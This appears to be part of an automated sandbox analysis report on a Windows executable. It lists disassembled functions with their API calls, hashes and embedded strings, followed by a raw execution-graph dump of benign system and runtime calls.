                                                                                • Opcode ID: 78dc37e4e071e228ed3534b9df95560ad3d484c652abfb19ccc8d1b5f8958ebb
                                                                                • Instruction ID: 023b193cfb55f4bd442ed1a6e97222f438c108c8cbf55b02b7ef048b01758370
                                                                                • Opcode Fuzzy Hash: 78dc37e4e071e228ed3534b9df95560ad3d484c652abfb19ccc8d1b5f8958ebb
                                                                                • Instruction Fuzzy Hash: EE51817AB14A8695EB009B65D4482EC2362FB85FDCF484231DA5DA7B97EF2CE944C340
                                                                                APIs
                                                                                Similarity
                                                                                • API ID: CreateCurrentDirectoryErrorFreeLastLocalProcess
                                                                                • String ID:
                                                                                • API String ID: 1077098981-0
                                                                                • Opcode ID: ca5d27243be9ec8130d03a2fe366c549bde872ce788a203b2958cc7020f45f59
                                                                                • Instruction ID: f7af4c1569f161eacea2ec250fc831e7e00f14879f2c73d8561d4b60adae8b1b
                                                                                • Opcode Fuzzy Hash: ca5d27243be9ec8130d03a2fe366c549bde872ce788a203b2958cc7020f45f59
                                                                                • Instruction Fuzzy Hash: 1B518136A18B8286E7408F61E4583AE77A4FB85F88F541035EA8DA7A55DF3DDC44CB40
                                                                                APIs
                                                                                Similarity
                                                                                • API ID: _invalid_parameter_noinfo$ByteCharErrorLastMultiWide
                                                                                • String ID:
                                                                                • API String ID: 4141327611-0
                                                                                • Opcode ID: fdb879c7c344a6dcddabd48f24568e2f5e84c2dc3f6ceef9c32cec135b3ccbbf
                                                                                • Instruction ID: e26020f65d4c72805d9aad345836b9d6338dda1230b0d5b2e39794602da3a0f2
                                                                                • Opcode Fuzzy Hash: fdb879c7c344a6dcddabd48f24568e2f5e84c2dc3f6ceef9c32cec135b3ccbbf
                                                                                • Instruction Fuzzy Hash: 4841813AA087C246FB659B10D0483796291EFC0F9AF1C8131DA5DE6A97DF6CEE918700
                                                                                APIs
                                                                                Similarity
                                                                                • API ID: FileMove_invalid_parameter_noinfo_noreturn
                                                                                • String ID:
                                                                                • API String ID: 3823481717-0
                                                                                • Opcode ID: 9a9a58264430c11791c0c606b390f78d08ba3037c1fa37d6a31b7cedc8df9908
                                                                                • Instruction ID: 23c861c467e614443b1de798ffb245aa7797fdb6f6faa5680e1bf434250b4c23
                                                                                • Opcode Fuzzy Hash: 9a9a58264430c11791c0c606b390f78d08ba3037c1fa37d6a31b7cedc8df9908
                                                                                • Instruction Fuzzy Hash: 3841BE66F14B91C4FB00CBB9D8881AC23B1BF44FA8B195231DE5DA6A9ADF3CD845C240
                                                                                APIs
                                                                                • GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF65595C45B), ref: 00007FF655960B91
                                                                                • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF65595C45B), ref: 00007FF655960BF3
                                                                                • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF65595C45B), ref: 00007FF655960C2D
                                                                                • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF65595C45B), ref: 00007FF655960C57
                                                                                Similarity
                                                                                • API ID: ByteCharEnvironmentMultiStringsWide$Free
                                                                                • String ID:
                                                                                • API String ID: 1557788787-0
                                                                                • Opcode ID: 23704c5f87cc5d65a6a85ab0da0438508b9fc27f2b888927c3d6011bf25654c1
                                                                                • Instruction ID: 4f12e1133e886e0d1eb26e495f8dfeba24b77a9a92538a916c60b0f60424b5be
                                                                                • Opcode Fuzzy Hash: 23704c5f87cc5d65a6a85ab0da0438508b9fc27f2b888927c3d6011bf25654c1
                                                                                • Instruction Fuzzy Hash: 32218435F18BD185EA249F11A49402976E4FB94FD4B0C4134DE8EB3B96DF3CE8568340
                                                                                APIs
                                                                                Similarity
                                                                                • API ID: ErrorLast$abort
                                                                                • String ID:
                                                                                • API String ID: 1447195878-0
                                                                                • Opcode ID: df247b5a3948333368795c339682862bf84e23f7c025c70b8dad3e7beb060077
                                                                                • Instruction ID: 131a1ccb404cfd585669905b1e2b7bdbfa6bd40b69cfcdb80361181c0744f6cf
                                                                                • Opcode Fuzzy Hash: df247b5a3948333368795c339682862bf84e23f7c025c70b8dad3e7beb060077
                                                                                • Instruction Fuzzy Hash: 1B018028B097C642FA59AB71A65D17811925F84FDAF0C1438D91EE67D7EF2CBD248240
                                                                                APIs
                                                                                Similarity
                                                                                • API ID: CapsDevice$Release
                                                                                • String ID:
                                                                                • API String ID: 1035833867-0
                                                                                • Opcode ID: de15d0a72ac65e47349a1b4cc9ca260558533dfe27db70e7b1e031f833f09c6c
                                                                                • Instruction ID: 4b66c8a3ed075f469289ddc521626b51460d424d0e1ab132a6a2d3d57084ad6b
                                                                                • Opcode Fuzzy Hash: de15d0a72ac65e47349a1b4cc9ca260558533dfe27db70e7b1e031f833f09c6c
                                                                                • Instruction Fuzzy Hash: 3EE0ED68E0968282FF085B71686D1362190AF48F49F4C843DD81EE6352DF3DE8858611
                                                                                APIs
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: _invalid_parameter_noinfo_noreturn
                                                                                • String ID: DXGIDebug.dll
                                                                                • API String ID: 3668304517-540382549
                                                                                • Opcode ID: f6f652c4426adce50dbf435433714115e5776bfcc552121c901ae94cf08821c0
                                                                                • Instruction ID: ee017adab2a26b5693b1502439cfe1816c79cfd793bc33a5546ec499de32748d
                                                                                • Opcode Fuzzy Hash: f6f652c4426adce50dbf435433714115e5776bfcc552121c901ae94cf08821c0
                                                                                • Instruction Fuzzy Hash: 6A71AE76A14B8182EB14CB65E8483ADB3A4FB54BD8F484235DBAC57B96DF7CD861C300
                                                                                APIs
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: _invalid_parameter_noinfo
                                                                                • String ID: e+000$gfff
                                                                                • API String ID: 3215553584-3030954782
                                                                                • Opcode ID: ffbcb58cc87a1110f60409a8afde5d08377aab6ce8cf060c3284a5669936e3c2
                                                                                • Instruction ID: 734974bb7d6d688c24714188ca3fabff044561427c50d5f1ad463b3a9731c0d1
                                                                                • Opcode Fuzzy Hash: ffbcb58cc87a1110f60409a8afde5d08377aab6ce8cf060c3284a5669936e3c2
                                                                                • Instruction Fuzzy Hash: 1551236AB187C146E7258B3598443696B91EB80F94F4C8275CB9CD7BDACF2DE854C700
                                                                                APIs
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: _invalid_parameter_noinfo_noreturn$swprintf
                                                                                • String ID: SIZE
                                                                                • API String ID: 449872665-3243624926
                                                                                • Opcode ID: 95182320ee7b3a48c420107a4992996f84afbbac13f0d5532198c1d22c251322
                                                                                • Instruction ID: 7f71cb7f02cd99dede0840e7022b4f7b267411043bc2d27b961805d9a09da00d
                                                                                • Opcode Fuzzy Hash: 95182320ee7b3a48c420107a4992996f84afbbac13f0d5532198c1d22c251322
                                                                                • Instruction Fuzzy Hash: 4741B466A186C386EE10DF14E4493BD6350EF85B98F594231EA9D966D7EF3CD980C700
                                                                                APIs
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: FileModuleName_invalid_parameter_noinfo
                                                                                • String ID: C:\Users\user\Desktop\h2UFp4aCRq.exe
                                                                                • API String ID: 3307058713-3792028742
                                                                                • Opcode ID: 2b307fc7043d57580c2760bc14d10e66149d3294dbd6a1f00798eb6953a6f573
                                                                                • Instruction ID: 07fae52ec9bbef0b355e0f4aaa056960c7871703da4b60e0fe462fa124620771
                                                                                • Opcode Fuzzy Hash: 2b307fc7043d57580c2760bc14d10e66149d3294dbd6a1f00798eb6953a6f573
                                                                                • Instruction Fuzzy Hash: 3641823AA09B9686EB159F21A8441BC7794EF84FD8B484031EA4EE7746DF3DE851C380
                                                                                APIs
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: Item$Text$Dialog
                                                                                • String ID: ASKNEXTVOL
                                                                                • API String ID: 2638039312-3402441367
                                                                                • Opcode ID: dcd268aa3fbf12e0d7b9e6ebcb2085d3825137d47b75af17d5842d9a86e293fc
                                                                                • Instruction ID: 889f32d87472f02ed05f26c092d847bb7e21b016b26d2660904a9dbf12104ac1
                                                                                • Opcode Fuzzy Hash: dcd268aa3fbf12e0d7b9e6ebcb2085d3825137d47b75af17d5842d9a86e293fc
                                                                                • Instruction Fuzzy Hash: 2841822AA0C6C281FA109B11E9582B963A1BF85FC9F1C4035DE9DA7797DF3DEC518341
                                                                                APIs
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: ByteCharMultiWide_snwprintf
                                                                                • String ID: $%s$@%s
                                                                                • API String ID: 2650857296-834177443
                                                                                • Opcode ID: 68d6d98aec82f67e7f26d78b4367655257a27e60e60eb814561ac576190adeba
                                                                                • Instruction ID: 35474566a6823b6f65f68e9dae0a3f8bc940510f5318fdf66b08961dc6b22fa8
                                                                                • Opcode Fuzzy Hash: 68d6d98aec82f67e7f26d78b4367655257a27e60e60eb814561ac576190adeba
                                                                                • Instruction Fuzzy Hash: 4831C37AB19A8B86EA108F65D4483A927A0FB44FCCF490032DE0D67796DF3CE905C740
                                                                                APIs
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: DialogParamVisibleWindow
                                                                                • String ID: GETPASSWORD1
                                                                                • API String ID: 3157717868-3292211884
                                                                                • Opcode ID: 3689008c5ae976a1f3a242e5b1eb30ef9737a63c20829ff4d7ba5964f065d3d0
                                                                                • Instruction ID: aef18f7adda94019ef782c4e5b784f855210c3190c44bdba5b8c66e47d6d8a36
                                                                                • Opcode Fuzzy Hash: 3689008c5ae976a1f3a242e5b1eb30ef9737a63c20829ff4d7ba5964f065d3d0
                                                                                • Instruction Fuzzy Hash: EE314D2DA0C7C285EB008B22A8580B92B61AF45F88F8C4035DA9DB7767DF2DFC54C351
                                                                                APIs
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: FileHandleType
                                                                                • String ID: @
                                                                                • API String ID: 3000768030-2766056989
                                                                                • Opcode ID: 01c4e23626c5bd34e0d32a71787dfe5976e9b76bf070a7e2fa99837352baeece
                                                                                • Instruction ID: a4d6e8fd14379eb1c80577b84474b1c2a72d74a8bd3c3183be0c5e3eb471c8f9
                                                                                • Opcode Fuzzy Hash: 01c4e23626c5bd34e0d32a71787dfe5976e9b76bf070a7e2fa99837352baeece
                                                                                • Instruction Fuzzy Hash: B621A126E086C241EB708B2694981382659EF45B7AF2C0379D66FA67D5CF3EDC95C201
                                                                                APIs
                                                                                • RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF655951D3E), ref: 00007FF6559540BC
                                                                                • RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF655951D3E), ref: 00007FF655954102
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: ExceptionFileHeaderRaise
                                                                                • String ID: csm
                                                                                • API String ID: 2573137834-1018135373
                                                                                • Opcode ID: 995ce70781ed1107fbe35a2df86b6ab92d82f2488d4e31342cdb9a65d606da21
                                                                                • Instruction ID: 89a510b23fd96e3fabb6a4ef45c85fbfcef4ed13f8e440a7661f26d9c7c232c0
                                                                                • Opcode Fuzzy Hash: 995ce70781ed1107fbe35a2df86b6ab92d82f2488d4e31342cdb9a65d606da21
                                                                                • Instruction Fuzzy Hash: 55116D36608B8182EB608B25E44426977E0FB88F88F2C4230DF8C57755DF3CC965C700
                                                                                APIs
                                                                                • WaitForSingleObject.KERNEL32(?,?,?,?,?,?,?,?,00007FF65593E95F,?,?,?,00007FF65593463A,?,?,?), ref: 00007FF65593EA63
                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00007FF65593E95F,?,?,?,00007FF65593463A,?,?,?), ref: 00007FF65593EA6E
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorLastObjectSingleWait
                                                                                • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                                                                • API String ID: 1211598281-2248577382
                                                                                • Opcode ID: 98ce5a6e9b01a49333d4d7b683bb298ff4a8e953ba0927a3bf2f7aa8eb90df55
                                                                                • Instruction ID: 51549a31964d292f86f33495fae6c9172e3107d0ff85bd555569100ca47edddb
                                                                                • Opcode Fuzzy Hash: 98ce5a6e9b01a49333d4d7b683bb298ff4a8e953ba0927a3bf2f7aa8eb90df55
                                                                                • Instruction Fuzzy Hash: 2EE01A2DE1998281F600A7249C4E4B826927F60FB8FAC4330D03EE15E39F2CAD498341
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID: FindHandleModuleResource
                                                                                • String ID: RTL
                                                                                • API String ID: 3537982541-834975271
                                                                                • Opcode ID: e39cf6139d6c3c808756c827088780cb49cd2dd94430b396554b51375d39015a
                                                                                • Instruction ID: dd44111329cd88169ff4cce313bac9b10bbd2d0473b6c0cec8bfb65dd15181a8
                                                                                • Opcode Fuzzy Hash: e39cf6139d6c3c808756c827088780cb49cd2dd94430b396554b51375d39015a
                                                                                • Instruction Fuzzy Hash: 6AD05EA9F0978282FF194B71A45D37412905F18F49F8D9038C84E9A392EF2CD8CCC791

                                                                                Execution Graph

                                                                                Execution Coverage:12.8%
                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                Signature Coverage:0%
                                                                                Total number of Nodes:2000
                                                                                Total number of Limit Nodes:28
26221->27867 26223 7ff7ab4aba96 27868 7ff7ab49ba50 99 API calls 3 library calls 26223->27868 26225 7ff7ab4aba9e 27869 7ff7ab49b664 RtlPcToFileHeader RaiseException _com_raise_error 26225->27869 26228 7ff7ab4bfbdc 33 API calls 26227->26228 26228->25781 26230 7ff7ab4c3620 26229->26230 26230->25785 26231->25700 26233 7ff7ab491177 26232->26233 26234 7ff7ab492034 33 API calls 26233->26234 26235 7ff7ab491185 memcpy_s 26234->26235 26235->25714 26238 7ff7ab492085 26237->26238 26239 7ff7ab492059 memcpy_s 26237->26239 27870 7ff7ab4915b8 33 API calls 3 library calls 26238->27870 26239->25687 26242 7ff7ab4c2329 26241->26242 26243 7ff7ab4bc350 26242->26243 26244 7ff7ab4c2550 IsProcessorFeaturePresent 26242->26244 26245 7ff7ab4c2568 26244->26245 27871 7ff7ab4c2744 RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 26245->27871 26247 7ff7ab4c257b 27872 7ff7ab4c2510 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 26247->27872 27873 7ff7ab4c783c 31 API calls 2 library calls 26250->27873 26252 7ff7ab4c791d 27874 7ff7ab4c7934 16 API calls abort 26252->27874 26255->25742 26258 7ff7ab49e1b2 26256->26258 26257 7ff7ab49e345 27876 7ff7ab492004 33 API calls std::_Xinvalid_argument 26257->27876 26258->26257 26261 7ff7ab49e340 26258->26261 26262 7ff7ab49e2bc 26258->26262 26265 7ff7ab49e1b8 memcpy_s 26258->26265 27875 7ff7ab491f80 33 API calls 3 library calls 26261->27875 26264 7ff7ab4c21d0 33 API calls 26262->26264 26262->26265 26264->26265 26265->25809 26266->25833 26267->25860 26293 7ff7ab4a3e28 26268->26293 26272 7ff7ab4aa519 26273 7ff7ab4aa589 26272->26273 26291 7ff7ab4aa56a SetDlgItemTextW 26272->26291 26314 7ff7ab4a9800 26272->26314 26299 7ff7ab4a9408 26273->26299 26276 7ff7ab4aa6f2 GetSystemMetrics GetWindow 26280 7ff7ab4aa821 26276->26280 26281 7ff7ab4aa71d 26276->26281 26277 7ff7ab4aa603 26278 7ff7ab4aa6c2 26277->26278 26279 7ff7ab4aa60c GetWindowLongPtrW 26277->26279 26318 7ff7ab4a95a8 26278->26318 26283 7ff7ab4fe2c0 26279->26283 26282 
7ff7ab4c2320 _handle_error 8 API calls 26280->26282 26281->26280 26290 7ff7ab4aa73e GetWindowRect 26281->26290 26292 7ff7ab4aa800 GetWindow 26281->26292 26285 7ff7ab4aa830 26282->26285 26286 7ff7ab4aa6aa GetWindowRect 26283->26286 26285->25873 26286->26278 26289 7ff7ab4aa6e5 SetDlgItemTextW 26289->26276 26290->26281 26291->26272 26292->26280 26292->26281 26294 7ff7ab4a3e4d swprintf 26293->26294 26327 7ff7ab4c9ef0 26294->26327 26297 7ff7ab4b0f68 WideCharToMultiByte 26298 7ff7ab4b0faa 26297->26298 26298->26272 26300 7ff7ab4a95a8 47 API calls 26299->26300 26302 7ff7ab4a944f 26300->26302 26301 7ff7ab4c2320 _handle_error 8 API calls 26303 7ff7ab4a958e GetWindowRect GetClientRect 26301->26303 26304 7ff7ab49129c 33 API calls 26302->26304 26312 7ff7ab4a955a 26302->26312 26303->26276 26303->26277 26305 7ff7ab4a949c 26304->26305 26306 7ff7ab4a95a1 26305->26306 26308 7ff7ab49129c 33 API calls 26305->26308 26307 7ff7ab4c7904 _invalid_parameter_noinfo_noreturn 31 API calls 26306->26307 26309 7ff7ab4a95a7 26307->26309 26310 7ff7ab4a9514 26308->26310 26311 7ff7ab4a959c 26310->26311 26310->26312 26313 7ff7ab4c7904 _invalid_parameter_noinfo_noreturn 31 API calls 26311->26313 26312->26301 26313->26306 26315 7ff7ab4a9840 26314->26315 26317 7ff7ab4a9869 26314->26317 26366 7ff7ab4ca270 31 API calls 2 library calls 26315->26366 26317->26272 26319 7ff7ab4a3e28 swprintf 46 API calls 26318->26319 26320 7ff7ab4a95eb 26319->26320 26321 7ff7ab4b0f68 WideCharToMultiByte 26320->26321 26322 7ff7ab4a9603 26321->26322 26323 7ff7ab4a9800 31 API calls 26322->26323 26324 7ff7ab4a961b 26323->26324 26325 7ff7ab4c2320 _handle_error 8 API calls 26324->26325 26326 7ff7ab4a962b 26325->26326 26326->26276 26326->26289 26328 7ff7ab4c9f36 26327->26328 26329 7ff7ab4c9f4e 26327->26329 26354 7ff7ab4cd69c 15 API calls _invalid_parameter_noinfo 26328->26354 26329->26328 26331 7ff7ab4c9f58 26329->26331 26356 7ff7ab4c7ef0 35 API calls 2 library calls 26331->26356 26332 7ff7ab4c9f3b 26355 7ff7ab4c78e4 31 API calls 
_invalid_parameter_noinfo 26332->26355 26335 7ff7ab4c9f69 memcpy_s 26357 7ff7ab4c7e70 15 API calls _set_fmode 26335->26357 26336 7ff7ab4c2320 _handle_error 8 API calls 26337 7ff7ab4a3e69 26336->26337 26337->26297 26339 7ff7ab4c9fd4 26358 7ff7ab4c82f8 46 API calls 3 library calls 26339->26358 26341 7ff7ab4c9fdd 26342 7ff7ab4ca014 26341->26342 26343 7ff7ab4c9fe5 26341->26343 26345 7ff7ab4ca06c 26342->26345 26346 7ff7ab4ca023 26342->26346 26347 7ff7ab4ca092 26342->26347 26350 7ff7ab4ca01a 26342->26350 26359 7ff7ab4cd90c 26343->26359 26351 7ff7ab4cd90c __free_lconv_mon 15 API calls 26345->26351 26349 7ff7ab4cd90c __free_lconv_mon 15 API calls 26346->26349 26347->26345 26348 7ff7ab4ca09c 26347->26348 26352 7ff7ab4cd90c __free_lconv_mon 15 API calls 26348->26352 26353 7ff7ab4c9f46 26349->26353 26350->26345 26350->26346 26351->26353 26352->26353 26353->26336 26354->26332 26355->26353 26356->26335 26357->26339 26358->26341 26360 7ff7ab4cd911 RtlRestoreThreadPreferredUILanguages 26359->26360 26361 7ff7ab4cd941 __free_lconv_mon 26359->26361 26360->26361 26362 7ff7ab4cd92c 26360->26362 26361->26353 26365 7ff7ab4cd69c 15 API calls _invalid_parameter_noinfo 26362->26365 26364 7ff7ab4cd931 GetLastError 26364->26361 26365->26364 26366->26317 26379 7ff7ab4913a4 26367->26379 26370 7ff7ab492494 26371 7ff7ab49129c 33 API calls 26370->26371 26372 7ff7ab4924a2 26371->26372 26373 7ff7ab4924dd 26372->26373 26376 7ff7ab492505 26372->26376 26374 7ff7ab4c2320 _handle_error 8 API calls 26373->26374 26375 7ff7ab4924f3 26374->26375 26375->25881 26377 7ff7ab4c7904 _invalid_parameter_noinfo_noreturn 31 API calls 26376->26377 26378 7ff7ab49250a 26377->26378 26380 7ff7ab49142d GetWindowTextW 26379->26380 26381 7ff7ab4913ad 26379->26381 26380->26370 26382 7ff7ab49143d 26381->26382 26383 7ff7ab4913ce 26381->26383 26399 7ff7ab492018 33 API calls std::_Xinvalid_argument 26382->26399 26387 7ff7ab4913db memcpy_s 26383->26387 26389 7ff7ab4c21d0 26383->26389 26398 7ff7ab49197c 31 API calls 
_invalid_parameter_noinfo_noreturn 26387->26398 26392 7ff7ab4c21db 26389->26392 26390 7ff7ab4c21f4 26390->26387 26392->26390 26393 7ff7ab4c21fa 26392->26393 26400 7ff7ab4cbbc0 26392->26400 26394 7ff7ab4c2205 26393->26394 26403 7ff7ab4c2f7c RtlPcToFileHeader RaiseException _com_raise_error std::bad_alloc::bad_alloc 26393->26403 26404 7ff7ab491f80 33 API calls 3 library calls 26394->26404 26397 7ff7ab4c220b 26398->26380 26405 7ff7ab4cbc00 26400->26405 26403->26394 26404->26397 26410 7ff7ab4cf398 EnterCriticalSection 26405->26410 26418 7ff7ab4a9638 26411->26418 26414 7ff7ab4a97d9 26416 7ff7ab4c2320 _handle_error 8 API calls 26414->26416 26415 7ff7ab4a9800 31 API calls 26415->26414 26417 7ff7ab4a97f2 26416->26417 26417->25895 26417->25896 26419 7ff7ab4a9692 26418->26419 26427 7ff7ab4a9730 26418->26427 26420 7ff7ab4b0f68 WideCharToMultiByte 26419->26420 26423 7ff7ab4a96c0 26419->26423 26420->26423 26421 7ff7ab4c2320 _handle_error 8 API calls 26422 7ff7ab4a9764 26421->26422 26422->26414 26422->26415 26426 7ff7ab4a96ef 26423->26426 26428 7ff7ab4aaa88 45 API calls 2 library calls 26423->26428 26429 7ff7ab4ca270 31 API calls 2 library calls 26426->26429 26427->26421 26428->26426 26429->26427 26430->25900 26433 7ff7ab4bae80 GetDlgItem 26432->26433 26434 7ff7ab4bae3c GetMessageW 26432->26434 26433->25911 26433->25912 26435 7ff7ab4bae6a TranslateMessage DispatchMessageW 26434->26435 26436 7ff7ab4bae5b IsDialogMessageW 26434->26436 26435->26433 26436->26433 26436->26435 26439 7ff7ab4a36b3 26437->26439 26438 7ff7ab4a36e0 26457 7ff7ab4a32bc 26438->26457 26439->26438 26440 7ff7ab4a36cc CreateDirectoryW 26439->26440 26440->26438 26442 7ff7ab4a377d 26440->26442 26444 7ff7ab4a378d 26442->26444 26471 7ff7ab4a3d34 26442->26471 26449 7ff7ab4c2320 _handle_error 8 API calls 26444->26449 26445 7ff7ab4a3791 GetLastError 26445->26444 26452 7ff7ab4a37b9 26449->26452 26450 7ff7ab4a3720 CreateDirectoryW 26451 7ff7ab4a373b 26450->26451 26453 7ff7ab4a3774 26451->26453 26454 7ff7ab4a37ce 
26451->26454 26452->25927 26453->26442 26453->26445 26455 7ff7ab4c7904 _invalid_parameter_noinfo_noreturn 31 API calls 26454->26455 26456 7ff7ab4a37d3 26455->26456 26458 7ff7ab4a32e4 26457->26458 26459 7ff7ab4a32e7 GetFileAttributesW 26457->26459 26458->26459 26460 7ff7ab4a32f8 26459->26460 26461 7ff7ab4a3375 26459->26461 26463 7ff7ab4a6a0c 49 API calls 26460->26463 26462 7ff7ab4c2320 _handle_error 8 API calls 26461->26462 26464 7ff7ab4a3389 26462->26464 26465 7ff7ab4a331f 26463->26465 26464->26445 26485 7ff7ab4a6a0c 26464->26485 26466 7ff7ab4a3323 GetFileAttributesW 26465->26466 26467 7ff7ab4a333c 26465->26467 26466->26467 26467->26461 26468 7ff7ab4a3399 26467->26468 26469 7ff7ab4c7904 _invalid_parameter_noinfo_noreturn 31 API calls 26468->26469 26470 7ff7ab4a339e 26469->26470 26472 7ff7ab4a3d5b 26471->26472 26473 7ff7ab4a3d5e SetFileAttributesW 26471->26473 26472->26473 26474 7ff7ab4a3d74 26473->26474 26481 7ff7ab4a3df5 26473->26481 26476 7ff7ab4a6a0c 49 API calls 26474->26476 26475 7ff7ab4c2320 _handle_error 8 API calls 26477 7ff7ab4a3e0a 26475->26477 26478 7ff7ab4a3d99 26476->26478 26477->26444 26479 7ff7ab4a3dbc 26478->26479 26480 7ff7ab4a3d9d SetFileAttributesW 26478->26480 26479->26481 26482 7ff7ab4a3e1a 26479->26482 26480->26479 26481->26475 26483 7ff7ab4c7904 _invalid_parameter_noinfo_noreturn 31 API calls 26482->26483 26484 7ff7ab4a3e1f 26483->26484 26486 7ff7ab4a6a44 26485->26486 26487 7ff7ab4a6a4b 26485->26487 26488 7ff7ab4c2320 _handle_error 8 API calls 26486->26488 26490 7ff7ab49129c 33 API calls 26487->26490 26489 7ff7ab4a371c 26488->26489 26489->26450 26489->26451 26491 7ff7ab4a6a76 26490->26491 26492 7ff7ab4a6a96 26491->26492 26493 7ff7ab4a6cc7 26491->26493 26495 7ff7ab4a6ab0 26492->26495 26496 7ff7ab4a6b49 26492->26496 26494 7ff7ab4a62dc 35 API calls 26493->26494 26498 7ff7ab4a6ce6 26494->26498 26523 7ff7ab4a70ab 26495->26523 26558 7ff7ab49c098 26495->26558 26520 7ff7ab49129c 33 API calls 26496->26520 26556 7ff7ab4a6b44 26496->26556 26497 
7ff7ab4a6eef 26505 7ff7ab49c098 33 API calls 26497->26505 26541 7ff7ab4a70cf 26497->26541 26498->26497 26500 7ff7ab4a6d1b 26498->26500 26498->26556 26507 7ff7ab49c098 33 API calls 26500->26507 26534 7ff7ab4a70bd 26500->26534 26501 7ff7ab4a70b1 26508 7ff7ab4c7904 _invalid_parameter_noinfo_noreturn 31 API calls 26501->26508 26504 7ff7ab4a6b03 26519 7ff7ab491fa0 31 API calls 26504->26519 26521 7ff7ab4a6b15 memcpy_s 26504->26521 26512 7ff7ab4a6f56 26505->26512 26533 7ff7ab4a6d76 memcpy_s 26507->26533 26517 7ff7ab4a70b7 26508->26517 26509 7ff7ab4a70d5 26510 7ff7ab4c7904 _invalid_parameter_noinfo_noreturn 31 API calls 26509->26510 26518 7ff7ab4a70db 26510->26518 26511 7ff7ab4a70a6 26516 7ff7ab4c7904 _invalid_parameter_noinfo_noreturn 31 API calls 26511->26516 26575 7ff7ab4911cc 33 API calls memcpy_s 26512->26575 26514 7ff7ab4a70c3 26527 7ff7ab4c7904 _invalid_parameter_noinfo_noreturn 31 API calls 26514->26527 26515 7ff7ab491fa0 31 API calls 26515->26556 26516->26523 26528 7ff7ab4c7904 _invalid_parameter_noinfo_noreturn 31 API calls 26517->26528 26524 7ff7ab4c7904 _invalid_parameter_noinfo_noreturn 31 API calls 26518->26524 26519->26521 26525 7ff7ab4a6bbe 26520->26525 26521->26515 26522 7ff7ab4a6f69 26576 7ff7ab4a57ac 33 API calls memcpy_s 26522->26576 26577 7ff7ab492004 33 API calls std::_Xinvalid_argument 26523->26577 26530 7ff7ab4a70e1 26524->26530 26566 7ff7ab4a5820 26525->26566 26532 7ff7ab4a70c9 26527->26532 26528->26534 26529 7ff7ab491fa0 31 API calls 26539 7ff7ab4a6df5 26529->26539 26579 7ff7ab49704c 47 API calls memcpy_s 26532->26579 26533->26514 26533->26529 26578 7ff7ab492004 33 API calls std::_Xinvalid_argument 26534->26578 26536 7ff7ab49e164 33 API calls 26551 7ff7ab4a6be9 memcpy_s 26536->26551 26538 7ff7ab491fa0 31 API calls 26542 7ff7ab4a6fec 26538->26542 26544 7ff7ab4a6e21 26539->26544 26574 7ff7ab491744 33 API calls 4 library calls 26539->26574 26540 7ff7ab4a6f79 memcpy_s 26540->26518 26540->26538 26580 7ff7ab492004 33 API calls std::_Xinvalid_argument 
